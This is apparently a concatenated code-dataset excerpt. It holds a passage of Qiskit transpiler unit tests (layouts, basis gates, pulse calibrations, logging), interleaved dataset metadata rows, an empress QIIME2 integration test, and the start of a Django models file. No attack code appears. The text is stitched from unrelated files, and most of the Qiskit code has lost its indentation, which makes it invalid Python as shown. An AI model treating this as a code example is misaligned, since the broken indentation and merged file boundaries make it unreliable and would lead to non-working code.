circuit.u(2.159209321625547, 0.0, 0.0, qr[5])
circuit.cx(qr[5], qr[3])
circuit.u(0.30949966910232335, 1.1706201763833217, 1.738408691990081, qr[3])
circuit.u(1.9630571407274755, -0.6818742967975088, 1.8336534616728195, qr[5])
circuit.u(1.330181833806101, 0.6003162754946363, -3.181264980452862, qr[7])
circuit.u(0.4885914820775024, 3.133297443244865, -2.794457469189904, qr[8])
circuit.cx(qr[8], qr[7])
circuit.p(2.2196187596178616, qr[7])
circuit.u(-3.152367609631023, 0.0, 0.0, qr[8])
circuit.cx(qr[7], qr[8])
circuit.u(1.2646005789809263, 0.0, 0.0, qr[8])
circuit.cx(qr[8], qr[7])
circuit.u(0.7517780502091939, 1.2828514296564781, 1.6781179605443775, qr[7])
circuit.u(0.9267400575390405, 2.0526277839695153, 2.034202361069533, qr[8])
circuit.u(2.550304293455634, 3.8250017126569698, -2.1351609599720054, qr[1])
circuit.u(0.9566260876600556, -1.1147561503064538, 2.0571590492298797, qr[4])
circuit.cx(qr[4], qr[1])
circuit.p(2.1899329069137394, qr[1])
circuit.u(-1.8371715243173294, 0.0, 0.0, qr[4])
circuit.cx(qr[1], qr[4])
circuit.u(0.4717053496327104, 0.0, 0.0, qr[4])
circuit.cx(qr[4], qr[1])
circuit.u(2.3167620677708145, -1.2337330260253256, -0.5671322899563955, qr[1])
circuit.u(1.0468499525240678, 0.8680750644809365, -1.4083720073192485, qr[4])
circuit.u(2.4204244021892807, -2.211701932616922, 3.8297006565735883, qr[10])
circuit.u(0.36660280497727255, 3.273119149343493, -1.8003362351299388, qr[6])
circuit.cx(qr[6], qr[10])
circuit.p(1.067395863586385, qr[10])
circuit.u(-0.7044917541291232, 0.0, 0.0, qr[6])
circuit.cx(qr[10], qr[6])
circuit.u(2.1830003849921527, 0.0, 0.0, qr[6])
circuit.cx(qr[6], qr[10])
circuit.u(2.1538343756723917, 2.2653381826084606, -3.550087952059485, qr[10])
circuit.u(1.307627685019188, -0.44686656993522567, -2.3238098554327418, qr[6])
circuit.u(2.2046797998462906, 0.9732961754855436, 1.8527865921467421, qr[9])
circuit.u(2.1665254613904126, -1.281337664694577, -1.2424905413631209, qr[0])
circuit.cx(qr[0], qr[9])
circuit.p(2.6209599970201007, qr[9])
circuit.u(0.04680566321901303, 0.0, 0.0, qr[0])
circuit.cx(qr[9], qr[0])
circuit.u(1.7728411151289603, 0.0, 0.0, qr[0])
circuit.cx(qr[0], qr[9])
circuit.u(2.4866395967434443, 0.48684511243566697, -3.0069186877854728, qr[9])
circuit.u(1.7369112924273789, -4.239660866163805, 1.0623389015296005, qr[0])
circuit.barrier(qr)
circuit.measure(qr, cr)
circuits = transpile(circuit, backend)
self.assertIsInstance(circuits, QuantumCircuit)
def test_transpiler_layout_from_intlist(self):
"""A list of ints gives layout to correctly map circuit.
virtual physical
q1_0 - 4 ---[H]---
q2_0 - 5
q2_1 - 6 ---[H]---
q3_0 - 8
q3_1 - 9
q3_2 - 10 ---[H]---
"""
qr1 = QuantumRegister(1, 'qr1')
qr2 = QuantumRegister(2, 'qr2')
qr3 = QuantumRegister(3, 'qr3')
qc = QuantumCircuit(qr1, qr2, qr3)
qc.h(qr1[0])
qc.h(qr2[1])
qc.h(qr3[2])
layout = [4, 5, 6, 8, 9, 10]
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10],
[5, 4], [5, 6], [5, 9], [6, 8], [7, 8],
[9, 8], [9, 10], [11, 3], [11, 10],
[11, 12], [12, 2], [13, 1], [13, 12]]
new_circ = transpile(qc, backend=None,
coupling_map=cmap,
basis_gates=['u2'],
initial_layout=layout)
mapped_qubits = []
for _, qargs, _ in new_circ.data:
mapped_qubits.append(qargs[0].index)
self.assertEqual(mapped_qubits, [4, 6, 10])
def test_mapping_multi_qreg(self):
"""Test mapping works for multiple qregs.
"""
backend = FakeRueschlikon()
qr = QuantumRegister(3, name='qr')
qr2 = QuantumRegister(1, name='qr2')
qr3 = QuantumRegister(4, name='qr3')
cr = ClassicalRegister(3, name='cr')
qc = QuantumCircuit(qr, qr2, qr3, cr)
qc.h(qr[0])
qc.cx(qr[0], qr2[0])
qc.cx(qr[1], qr3[2])
qc.measure(qr, cr)
circuits = transpile(qc, backend)
self.assertIsInstance(circuits, QuantumCircuit)
def test_transpile_circuits_diff_registers(self):
"""Transpile list of circuits with different qreg names.
"""
backend = FakeRueschlikon()
circuits = []
for _ in range(2):
qr = QuantumRegister(2)
cr = ClassicalRegister(2)
circuit = QuantumCircuit(qr, cr)
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.measure(qr, cr)
circuits.append(circuit)
circuits = transpile(circuits, backend)
self.assertIsInstance(circuits[0], QuantumCircuit)
def test_wrong_initial_layout(self):
"""Test transpile with a bad initial layout.
"""
backend = FakeMelbourne()
qubit_reg = QuantumRegister(2, name='q')
clbit_reg = ClassicalRegister(2, name='c')
qc = QuantumCircuit(qubit_reg, clbit_reg, name="bell")
qc.h(qubit_reg[0])
qc.cx(qubit_reg[0], qubit_reg[1])
qc.measure(qubit_reg, clbit_reg)
bad_initial_layout = [QuantumRegister(3, 'q')[0],
QuantumRegister(3, 'q')[1],
QuantumRegister(3, 'q')[2]]
with self.assertRaises(TranspilerError) as cm:
transpile(qc, backend, initial_layout=bad_initial_layout)
self.assertEqual("FullAncillaAllocation: The layout refers to a quantum register that does "
"not exist in circuit.", cm.exception.message)
def test_parameterized_circuit_for_simulator(self):
"""Verify that a parameterized circuit can be transpiled for a simulator backend."""
qr = QuantumRegister(2, name='qr')
qc = QuantumCircuit(qr)
theta = Parameter('theta')
qc.rz(theta, qr[0])
transpiled_qc = transpile(qc, backend=BasicAer.get_backend('qasm_simulator'))
expected_qc = QuantumCircuit(qr, global_phase=-1 * theta / 2.0)
expected_qc.append(U1Gate(theta), [qr[0]])
self.assertEqual(expected_qc, transpiled_qc)
def test_parameterized_circuit_for_device(self):
"""Verify that a parameterized circuit can be transpiled for a device backend."""
qr = QuantumRegister(2, name='qr')
qc = QuantumCircuit(qr)
theta = Parameter('theta')
qc.rz(theta, qr[0])
transpiled_qc = transpile(qc, backend=FakeMelbourne(),
initial_layout=Layout.generate_trivial_layout(qr))
qr = QuantumRegister(14, 'q')
expected_qc = QuantumCircuit(qr, global_phase=-1 * theta / 2.0)
expected_qc.append(U1Gate(theta), [qr[0]])
self.assertEqual(expected_qc, transpiled_qc)
def test_parameter_expression_circuit_for_simulator(self):
"""Verify that a circuit including expressions of parameters can be
transpiled for a simulator backend."""
qr = QuantumRegister(2, name='qr')
qc = QuantumCircuit(qr)
theta = Parameter('theta')
square = theta * theta
qc.rz(square, qr[0])
transpiled_qc = transpile(qc, backend=BasicAer.get_backend('qasm_simulator'))
expected_qc = QuantumCircuit(qr, global_phase=-1 * square / 2.0)
expected_qc.append(U1Gate(square), [qr[0]])
self.assertEqual(expected_qc, transpiled_qc)
def test_parameter_expression_circuit_for_device(self):
"""Verify that a circuit including expressions of parameters can be
transpiled for a device backend."""
qr = QuantumRegister(2, name='qr')
qc = QuantumCircuit(qr)
theta = Parameter('theta')
square = theta * theta
qc.rz(square, qr[0])
transpiled_qc = transpile(qc, backend=FakeMelbourne(),
initial_layout=Layout.generate_trivial_layout(qr))
qr = QuantumRegister(14, 'q')
expected_qc = QuantumCircuit(qr, global_phase=-1 * square / 2.0)
expected_qc.append(U1Gate(square), [qr[0]])
self.assertEqual(expected_qc, transpiled_qc)
def test_final_measurement_barrier_for_devices(self):
"""Verify BarrierBeforeFinalMeasurements pass is called in default pipeline for devices."""
circ = QuantumCircuit.from_qasm_file(self._get_resource_path('example.qasm', Path.QASMS))
layout = Layout.generate_trivial_layout(*circ.qregs)
orig_pass = BarrierBeforeFinalMeasurements()
with patch.object(BarrierBeforeFinalMeasurements, 'run', wraps=orig_pass.run) as mock_pass:
transpile(circ, coupling_map=FakeRueschlikon().configuration().coupling_map,
initial_layout=layout)
self.assertTrue(mock_pass.called)
def test_do_not_run_cxdirection_with_symmetric_cm(self):
"""When the coupling map is symmetric, do not run CXDirection."""
circ = QuantumCircuit.from_qasm_file(self._get_resource_path('example.qasm', Path.QASMS))
layout = Layout.generate_trivial_layout(*circ.qregs)
coupling_map = []
for node1, node2 in FakeRueschlikon().configuration().coupling_map:
coupling_map.append([node1, node2])
coupling_map.append([node2, node1])
orig_pass = CXDirection(CouplingMap(coupling_map))
with patch.object(CXDirection, 'run', wraps=orig_pass.run) as mock_pass:
transpile(circ, coupling_map=coupling_map, initial_layout=layout)
self.assertFalse(mock_pass.called)
def test_optimize_to_nothing(self):
""" Optimize gates up to fixed point in the default pipeline
See https://github.com/Qiskit/qiskit-terra/issues/2035 """
qr = QuantumRegister(2)
circ = QuantumCircuit(qr)
circ.h(qr[0])
circ.cx(qr[0], qr[1])
circ.x(qr[0])
circ.y(qr[0])
circ.z(qr[0])
circ.cx(qr[0], qr[1])
circ.h(qr[0])
circ.cx(qr[0], qr[1])
circ.cx(qr[0], qr[1])
after = transpile(circ, coupling_map=[[0, 1], [1, 0]],
basis_gates=['u3', 'u2', 'u1', 'cx'])
expected = QuantumCircuit(QuantumRegister(2, 'q'), global_phase=-np.pi/2)
self.assertEqual(after, expected)
def test_pass_manager_empty(self):
"""Test passing an empty PassManager() to the transpiler.
It should perform no transformations on the circuit.
"""
qr = QuantumRegister(2)
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
resources_before = circuit.count_ops()
pass_manager = PassManager()
out_circuit = pass_manager.run(circuit)
resources_after = out_circuit.count_ops()
self.assertDictEqual(resources_before, resources_after)
def test_move_measurements(self):
"""Measurements applied AFTER swap mapping.
"""
backend = FakeRueschlikon()
cmap = backend.configuration().coupling_map
circ = QuantumCircuit.from_qasm_file(
self._get_resource_path('move_measurements.qasm', Path.QASMS))
lay = [0, 1, 15, 2, 14, 3, 13, 4, 12, 5, 11, 6]
out = transpile(circ, initial_layout=lay, coupling_map=cmap)
out_dag = circuit_to_dag(out)
meas_nodes = out_dag.named_nodes('measure')
for meas_node in meas_nodes:
is_last_measure = all(after_measure.type == 'out'
for after_measure in out_dag.quantum_successors(meas_node))
self.assertTrue(is_last_measure)
def test_initialize_reset_should_be_removed(self):
"""The reset in front of initializer should be removed when zero state"""
qr = QuantumRegister(1, "qr")
qc = QuantumCircuit(qr)
qc.initialize([1.0 / math.sqrt(2), 1.0 / math.sqrt(2)], [qr[0]])
qc.initialize([1.0 / math.sqrt(2), -1.0 / math.sqrt(2)], [qr[0]])
expected = QuantumCircuit(qr)
expected.append(U3Gate(1.5708, 0, 0), [qr[0]])
expected.reset(qr[0])
expected.append(U3Gate(1.5708, 3.1416, 0), [qr[0]])
after = transpile(qc, basis_gates=['reset', 'u3'], optimization_level=1)
self.assertEqual(after, expected)
def test_initialize_FakeMelbourne(self):
"""Test that the zero-state resets are remove in a device not supporting them.
"""
desired_vector = [1 / math.sqrt(2), 0, 0, 0, 0, 0, 0, 1 / math.sqrt(2)]
qr = QuantumRegister(3, "qr")
qc = QuantumCircuit(qr)
qc.initialize(desired_vector, [qr[0], qr[1], qr[2]])
out = transpile(qc, backend=FakeMelbourne())
out_dag = circuit_to_dag(out)
reset_nodes = out_dag.named_nodes('reset')
self.assertEqual(reset_nodes, [])
def test_non_standard_basis(self):
"""Test a transpilation with a non-standard basis"""
qr1 = QuantumRegister(1, 'q1')
qr2 = QuantumRegister(2, 'q2')
qr3 = QuantumRegister(3, 'q3')
qc = QuantumCircuit(qr1, qr2, qr3)
qc.h(qr1[0])
qc.h(qr2[1])
qc.h(qr3[2])
layout = [4, 5, 6, 8, 9, 10]
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10], [5, 4], [5, 6], [5, 9],
[6, 8], [7, 8], [9, 8], [9, 10], [11, 3], [11, 10], [11, 12], [12, 2], [13, 1],
[13, 12]]
circuit = transpile(qc, backend=None, coupling_map=cmap,
basis_gates=['h'], initial_layout=layout)
dag_circuit = circuit_to_dag(circuit)
resources_after = dag_circuit.count_ops()
self.assertEqual({'h': 3}, resources_after)
def test_hadamard_to_rot_gates(self):
"""Test a transpilation from H to Rx, Ry gates"""
qr = QuantumRegister(1)
qc = QuantumCircuit(qr)
qc.h(0)
expected = QuantumCircuit(qr, global_phase=np.pi/2)
expected.append(RYGate(theta=np.pi/2), [0])
expected.append(RXGate(theta=np.pi), [0])
circuit = transpile(qc, basis_gates=['rx', 'ry'], optimization_level=0)
self.assertEqual(circuit, expected)
def test_basis_subset(self):
"""Test a transpilation with a basis subset of the standard basis"""
qr = QuantumRegister(1, 'q1')
qc = QuantumCircuit(qr)
qc.h(qr[0])
qc.x(qr[0])
qc.t(qr[0])
layout = [4]
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10], [5, 4], [5, 6], [5, 9],
[6, 8], [7, 8], [9, 8], [9, 10], [11, 3], [11, 10], [11, 12], [12, 2], [13, 1],
[13, 12]]
circuit = transpile(qc, backend=None, coupling_map=cmap,
basis_gates=['u3'], initial_layout=layout)
dag_circuit = circuit_to_dag(circuit)
resources_after = dag_circuit.count_ops()
self.assertEqual({'u3': 1}, resources_after)
def test_check_circuit_width(self):
"""Verify transpilation of circuit with virtual qubits greater than
physical qubits raises error"""
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10], [5, 4],
[5, 6], [5, 9], [6, 8], [7, 8], [9, 8], [9, 10],
[11, 3], [11, 10], [11, 12], [12, 2], [13, 1], [13, 12]]
qc = QuantumCircuit(15, 15)
with self.assertRaises(TranspilerError):
transpile(qc, coupling_map=cmap)
@data(0, 1, 2, 3)
def test_ccx_routing_method_none(self, optimization_level):
"""CCX without routing method."""
qc = QuantumCircuit(3)
qc.cx(0, 1)
qc.cx(1, 2)
out = transpile(qc, routing_method='none',
basis_gates=['u', 'cx'], initial_layout=[0, 1, 2], seed_transpiler=0,
coupling_map=[[0, 1], [1, 2]], optimization_level=optimization_level)
self.assertTrue(Operator(qc).equiv(out))
@data(0, 1, 2, 3)
def test_ccx_routing_method_none_failed(self, optimization_level):
"""CCX without routing method cannot be routed."""
qc = QuantumCircuit(3)
qc.ccx(0, 1, 2)
with self.assertRaises(TranspilerError):
transpile(qc, routing_method='none',
basis_gates=['u', 'cx'], initial_layout=[0, 1, 2], seed_transpiler=0,
coupling_map=[[0, 1], [1, 2]], optimization_level=optimization_level)
@data(0, 1, 2, 3)
def test_ms_unrolls_to_cx(self, optimization_level):
"""Verify a Rx,Ry,Rxx circuit transpile to a U3,CX target."""
qc = QuantumCircuit(2)
qc.rx(math.pi / 2, 0)
qc.ry(math.pi / 4, 1)
qc.rxx(math.pi / 4, 0, 1)
out = transpile(qc, basis_gates=['u3', 'cx'], optimization_level=optimization_level)
self.assertTrue(Operator(qc).equiv(out))
@data(0, 1, 2, 3)
def test_ms_can_target_ms(self, optimization_level):
"""Verify a Rx,Ry,Rxx circuit can transpile to an Rx,Ry,Rxx target."""
qc = QuantumCircuit(2)
qc.rx(math.pi / 2, 0)
qc.ry(math.pi / 4, 1)
qc.rxx(math.pi / 4, 0, 1)
out = transpile(qc, basis_gates=['rx', 'ry', 'rxx'], optimization_level=optimization_level)
self.assertTrue(Operator(qc).equiv(out))
@data(0, 1, 2, 3)
def test_cx_can_target_ms(self, optimization_level):
"""Verify a U3,CX circuit can transpiler to a Rx,Ry,Rxx target."""
qc = QuantumCircuit(2)
qc.h(0)
qc.cx(0, 1)
qc.rz(math.pi / 4, [0, 1])
out = transpile(qc, basis_gates=['rx', 'ry', 'rxx'], optimization_level=optimization_level)
self.assertTrue(Operator(qc).equiv(out))
@data(0, 1, 2, 3)
def test_measure_doesnt_unroll_ms(self, optimization_level):
"""Verify a measure doesn't cause an Rx,Ry,Rxx circuit to unroll to U3,CX."""
qc = QuantumCircuit(2, 2)
qc.rx(math.pi / 2, 0)
qc.ry(math.pi / 4, 1)
qc.rxx(math.pi / 4, 0, 1)
qc.measure([0, 1], [0, 1])
out = transpile(qc, basis_gates=['rx', 'ry', 'rxx'], optimization_level=optimization_level)
self.assertEqual(qc, out)
@data(
['cx', 'u3'],
['cz', 'u3'],
['cz', 'rx', 'rz'],
['rxx', 'rx', 'ry'],
['iswap', 'rx', 'rz'],
)
def test_block_collection_runs_for_non_cx_bases(self, basis_gates):
"""Verify block collection is run when a single two qubit gate is in the basis."""
twoq_gate, *_ = basis_gates
qc = QuantumCircuit(2)
qc.cx(0, 1)
qc.cx(1, 0)
qc.cx(0, 1)
qc.cx(0, 1)
out = transpile(qc, basis_gates=basis_gates, optimization_level=3)
self.assertLessEqual(out.count_ops()[twoq_gate], 2)
@unpack
@data(
(['u3', 'cx'], {'u3': 1, 'cx': 1}),
(['rx', 'rz', 'iswap'], {'rx': 6, 'rz': 12, 'iswap': 2}),
(['rx', 'ry', 'rxx'], {'rx': 6, 'ry': 5, 'rxx': 1}),
)
def test_block_collection_reduces_1q_gate(self, basis_gates, gate_counts):
"""For synthesis to non-U3 bases, verify we minimize 1q gates."""
qc = QuantumCircuit(2)
qc.h(0)
qc.cx(0, 1)
out = transpile(qc, basis_gates=basis_gates, optimization_level=3)
self.assertTrue(Operator(out).equiv(qc))
self.assertTrue(set(out.count_ops()).issubset(basis_gates))
for basis_gate in basis_gates:
self.assertLessEqual(out.count_ops()[basis_gate], gate_counts[basis_gate])
@combine(
optimization_level=[0, 1, 2, 3],
basis_gates=[
['u3', 'cx'],
['rx', 'rz', 'iswap'],
['rx', 'ry', 'rxx'],
],
)
def test_translation_method_synthesis(self, optimization_level, basis_gates):
"""Verify translation_method='synthesis' gets to the basis."""
qc = QuantumCircuit(2)
qc.h(0)
qc.cx(0, 1)
out = transpile(qc, translation_method='synthesis',
basis_gates=basis_gates,
optimization_level=optimization_level)
self.assertTrue(Operator(out).equiv(qc))
self.assertTrue(set(out.count_ops()).issubset(basis_gates))
def test_transpiled_custom_gates_calibration(self):
"""Test if transpiled calibrations is equal to custom gates circuit calibrations."""
custom_180 = Gate("mycustom", 1, [3.14])
custom_90 = Gate("mycustom", 1, [1.57])
circ = QuantumCircuit(2)
circ.append(custom_180, [0])
circ.append(custom_90, [1])
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
with pulse.build() as q1_y90:
pulse.play(pulse.library.Gaussian(20, -1.0, 3.0), pulse.DriveChannel(1))
# Add calibration
circ.add_calibration(custom_180, [0], q0_x180)
circ.add_calibration(custom_90, [1], q1_y90)
backend = FakeAlmaden()
transpiled_circuit = transpile(
circ,
backend=backend,
)
self.assertEqual(transpiled_circuit.calibrations, circ.calibrations)
self.assertEqual(list(transpiled_circuit.count_ops().keys()), ['mycustom'])
self.assertEqual(list(transpiled_circuit.count_ops().values()), [2])
def test_transpiled_basis_gates_calibrations(self):
"""Test if the transpiled calibrations is equal to basis gates circuit calibrations."""
circ = QuantumCircuit(2)
circ.h(0)
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
# Add calibration
circ.add_calibration("h", [0], q0_x180)
backend = FakeAlmaden()
transpiled_circuit = transpile(
circ,
backend=backend,
)
self.assertEqual(transpiled_circuit.calibrations, circ.calibrations)
def test_transpile_calibrated_custom_gate_on_diff_qubit(self):
"""Test if the custom, non calibrated gate raises QiskitError."""
custom_180 = Gate("mycustom", 1, [3.14])
circ = QuantumCircuit(2)
circ.append(custom_180, [0])
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
# Add calibration
circ.add_calibration(custom_180, [1], q0_x180)
backend = FakeAlmaden()
with self.assertRaises(QiskitError):
transpile(circ, backend=backend)
def test_transpile_calibrated_nonbasis_gate_on_diff_qubit(self):
"""Test if the non-basis gates are transpiled if they are on different qubit that
is not calibrated."""
circ = QuantumCircuit(2)
circ.h(0)
circ.h(1)
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
# Add calibration
circ.add_calibration("h", [1], q0_x180)
backend = FakeAlmaden()
transpiled_circuit = transpile(
circ,
backend=backend,
)
self.assertEqual(transpiled_circuit.calibrations, circ.calibrations)
self.assertEqual(set(transpiled_circuit.count_ops().keys()), {'u2', 'h'})
def test_transpile_subset_of_calibrated_gates(self):
"""Test transpiling a circuit with both basis gate (not-calibrated) and
a calibrated gate on different qubits."""
x_180 = Gate('mycustom', 1, [3.14])
circ = QuantumCircuit(2)
circ.h(0)
circ.append(x_180, [0])
circ.h(1)
with pulse.build() as q0_x180:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
circ.add_calibration(x_180, [0], q0_x180)
circ.add_calibration('h', [1], q0_x180) # 'h' is calibrated on qubit 1
transpiled_circ = transpile(circ, FakeAlmaden())
self.assertEqual(set(transpiled_circ.count_ops().keys()), {'u2', 'mycustom', 'h'})
def test_parameterized_calibrations_transpile(self):
"""Check that gates can be matched to their calibrations before and after parameter
assignment."""
tau = Parameter('tau')
circ = QuantumCircuit(3, 3)
circ.append(Gate('rxt', 1, [2*3.14*tau]), [0])
def q0_rxt(tau):
with pulse.build() as q0_rxt:
pulse.play(pulse.library.Gaussian(20, 0.4*tau, 3.0), pulse.DriveChannel(0))
return q0_rxt
circ.add_calibration('rxt', [0], q0_rxt(tau), [2*3.14*tau])
transpiled_circ = transpile(circ, FakeAlmaden())
self.assertEqual(set(transpiled_circ.count_ops().keys()), {'rxt'})
circ = circ.assign_parameters({tau: 1})
transpiled_circ = transpile(circ, FakeAlmaden())
self.assertEqual(set(transpiled_circ.count_ops().keys()), {'rxt'})
def test_inst_durations_from_calibrations(self):
"""Test that circuit calibrations can be used instead of explicitly
supplying inst_durations.
"""
qc = QuantumCircuit(2)
qc.append(Gate('custom', 1, []), [0])
with pulse.build() as cal:
pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0))
qc.add_calibration('custom', [0], cal)
out = transpile(qc, scheduling_method='alap')
self.assertEqual(out.duration, cal.duration)
@data(0, 1, 2, 3)
def test_circuit_with_delay(self, optimization_level):
"""Verify a circuit with delay can transpile to a scheduled circuit."""
qc = QuantumCircuit(2)
qc.h(0)
qc.delay(500, 1)
qc.cx(0, 1)
out = transpile(qc, scheduling_method='alap', basis_gates=['h', 'cx'],
instruction_durations=[('h', 0, 200), ('cx', [0, 1], 700)],
optimization_level=optimization_level)
self.assertEqual(out.duration, 1200)
def test_delay_converts_to_dt(self):
"""Test that a delay instruction is converted to units of dt given a backend."""
qc = QuantumCircuit(2)
qc.delay(1000, [0], unit='us')
backend = FakeRueschlikon()
backend.configuration().dt = 0.5e-6
out = transpile([qc, qc], backend)
self.assertEqual(out[0].data[0][0].unit, 'dt')
self.assertEqual(out[1].data[0][0].unit, 'dt')
out = transpile(qc, dt=1e-9)
self.assertEqual(out.data[0][0].unit, 'dt')
@data(1, 2, 3)
def test_no_infinite_loop(self, optimization_level):
"""Verify circuit cost always descends and optimization does not flip flop indefinitely."""
qc = QuantumCircuit(1)
qc.ry(0.2, 0)
out = transpile(qc, basis_gates=['id', 'p', 'sx', 'cx'],
optimization_level=optimization_level)
# Expect a -pi/2 global phase for the U3 to RZ/SX conversion, and
# a -0.5 * theta phase for RZ to P twice, once at theta, and once at 3 pi
# for the second and third RZ gates in the U3 decomposition.
expected = QuantumCircuit(1, global_phase=-np.pi/2 - 0.5 * (0.2 + np.pi) - 0.5 * 3 * np.pi)
expected.sx(0)
expected.p(np.pi + 0.2, 0)
expected.sx(0)
expected.p(np.pi, 0)
error_message = "\nOutput circuit:\n%s\nExpected circuit:\n%s" % (
str(out), str(expected))
self.assertEqual(out, expected, error_message)
@data(0, 1, 2, 3)
def test_transpile_preserves_circuit_metadata(self, optimization_level):
"""Verify that transpile preserves circuit metadata in the output."""
circuit = QuantumCircuit(2, metadata=dict(experiment_id='1234', execution_number=4))
circuit.h(0)
circuit.cx(0, 1)
cmap = [[1, 0], [1, 2], [2, 3], [4, 3], [4, 10],
[5, 4], [5, 6], [5, 9], [6, 8], [7, 8],
[9, 8], [9, 10], [11, 3], [11, 10],
[11, 12], [12, 2], [13, 1], [13, 12]]
res = transpile(circuit, basis_gates=['id', 'p', 'sx', 'cx'],
coupling_map=cmap,
optimization_level=optimization_level)
self.assertEqual(circuit.metadata, res.metadata)
class StreamHandlerRaiseException(StreamHandler):
"""Handler class that will raise an exception on formatting errors."""
    def handleError(self, record):
        # re-raise the exception captured during formatting (raising the raw
        # sys.exc_info() tuple would itself fail on Python 3)
        raise sys.exc_info()[1]
class TestLogTranspile(QiskitTestCase):
"""Testing the log_transpile option."""
def setUp(self):
super().setUp()
logger = getLogger()
self.addCleanup(logger.setLevel, logger.level)
logger.setLevel('DEBUG')
self.output = io.StringIO()
logger.addHandler(StreamHandlerRaiseException(self.output))
self.circuit = QuantumCircuit(QuantumRegister(1))
def assertTranspileLog(self, log_msg):
""" Runs the transpiler and check for logs containing specified message"""
transpile(self.circuit)
self.output.seek(0)
# Filter unrelated log lines
output_lines = self.output.readlines()
transpile_log_lines = [x for x in output_lines if log_msg in x]
self.assertTrue(len(transpile_log_lines) > 0)
def test_transpile_log_time(self):
"""Check Total Transpile Time is logged"""
self.assertTranspileLog('Total Transpile Time')
class TestTranspileCustomPM(QiskitTestCase):
"""Test transpile function with custom pass manager"""
def test_custom_multiple_circuits(self):
"""Test transpiling with custom pass manager and multiple circuits.
        This test previously caused a deadlock, so it needs to be monitored for timeouts.
See: https://github.com/Qiskit/qiskit-terra/issues/3925
"""
qc = QuantumCircuit(2)
qc.h(0)
qc.cx(0, 1)
pm_conf = PassManagerConfig(
initial_layout=None,
basis_gates=['u1', 'u2', 'u3', 'cx'],
coupling_map=CouplingMap([[0, 1]]),
backend_properties=None,
seed_transpiler=1
)
passmanager = level_0_pass_manager(pm_conf)
transpiled = passmanager.run([qc, qc])
expected = QuantumCircuit(QuantumRegister(2, 'q'))
expected.append(U2Gate(0, 3.141592653589793), [0])
expected.cx(0, 1)
self.assertEqual(len(transpiled), 2)
self.assertEqual(transpiled[0], expected)
self.assertEqual(transpiled[1], expected)
| 38.73873 | 100 | 0.594196 |
711ab040d7f36bb981855ef874ffe67211edd915 | 3,253 | py | Python | tests/python/test_integration.py | sjanssen2/empress | 39a342de88b19ea41bf7adabd1016878e24de0d8 | [
"Apache-2.0",
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | tests/python/test_integration.py | sjanssen2/empress | 39a342de88b19ea41bf7adabd1016878e24de0d8 | [
"Apache-2.0",
"CC0-1.0",
"BSD-3-Clause"
] | 1 | 2019-11-18T20:38:12.000Z | 2019-11-18T20:38:12.000Z | tests/python/test_integration.py | sjanssen2/empress | 39a342de88b19ea41bf7adabd1016878e24de0d8 | [
"Apache-2.0",
"CC0-1.0",
"BSD-3-Clause"
] | null | null | null | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, empress development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import os
import unittest
from qiime2 import Artifact, Metadata
from qiime2.sdk import Results, Visualization
from qiime2.plugin.testing import TestPluginBase
class TestIntegration(TestPluginBase):
"""Runs an integration test using the moving pictures tutorial data.
This assumes that tests are being run from the root directory of Empress.
References
----------
This test class was adapted from q2-diversity:
https://github.com/qiime2/q2-diversity/blob/ebb99f8af91f7fe10cb44cd237931b072a7b4fee/q2_diversity/tests/test_beta_correlation.py
"""
package = "empress"
def setUp(self):
super().setUp()
# Just for reference for anyone reading this, self.plugin is set upon
# calling super().setUp() which looks at the "package" variable set
# above
self.plot = self.plugin.visualizers["plot"]
# Load the various input QZAs/etc. needed to run this test
prefixdir = os.path.join("docs", "moving-pictures")
self.tree = Artifact.load(os.path.join(prefixdir, "rooted-tree.qza"))
self.table = Artifact.load(os.path.join(prefixdir, "table.qza"))
self.md = Metadata.load(os.path.join(prefixdir, "sample_metadata.tsv"))
# We have to transform the taxonomy QZA to Metadata ourselves
self.taxonomy = Artifact.load(os.path.join(prefixdir, "taxonomy.qza"))
self.fmd = self.taxonomy.view(Metadata)
# Helps us distinguish between if the test was successful or not
self.result = None
# If the test was successful, we'll save the output QZV to this path
# during tearDown().
self.output_path = os.path.join(prefixdir, "empress-tree.qzv")
def test_execution(self):
"""Just checks that the visualizer at least runs without errors."""
self.result = self.plot(tree=self.tree, feature_table=self.table,
sample_metadata=self.md,
feature_metadata=self.fmd)
self.assertIsInstance(self.result, Results)
self.assertIsInstance(self.result.visualization, Visualization)
# TODO check details of viz more carefully (likely by digging into the
# index HTML of self.result.visualization, etc.)
def tearDown(self):
super().tearDown()
# Only overwrite "empress-tree.qzv" if the visualization was generated
# successfully. Note that "successfully" here just means that the test
# above passes -- in the future (if/when that TODO is addressed, and
# the contents of the generated visualization are inspected in detail),
# we could modify things to prevent overwriting this path if any of the
# additional tests we'd add would fail.
if self.result is not None:
self.result.visualization.save(self.output_path)
if __name__ == "__main__":
unittest.main()
| 41.705128 | 132 | 0.648017 |
f5b42bfd655f005dd97dd47c0f29499d96b5c223 | 794 | py | Python | accounts/models.py | towhid135/EasyApply | 0cb4a16405d70d48b1a06dc0f7206651d2fd353d | [
"MIT"
] | null | null | null | accounts/models.py | towhid135/EasyApply | 0cb4a16405d70d48b1a06dc0f7206651d2fd353d | [
"MIT"
] | null | null | null | accounts/models.py | towhid135/EasyApply | 0cb4a16405d70d48b1a06dc0f7206651d2fd353d | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
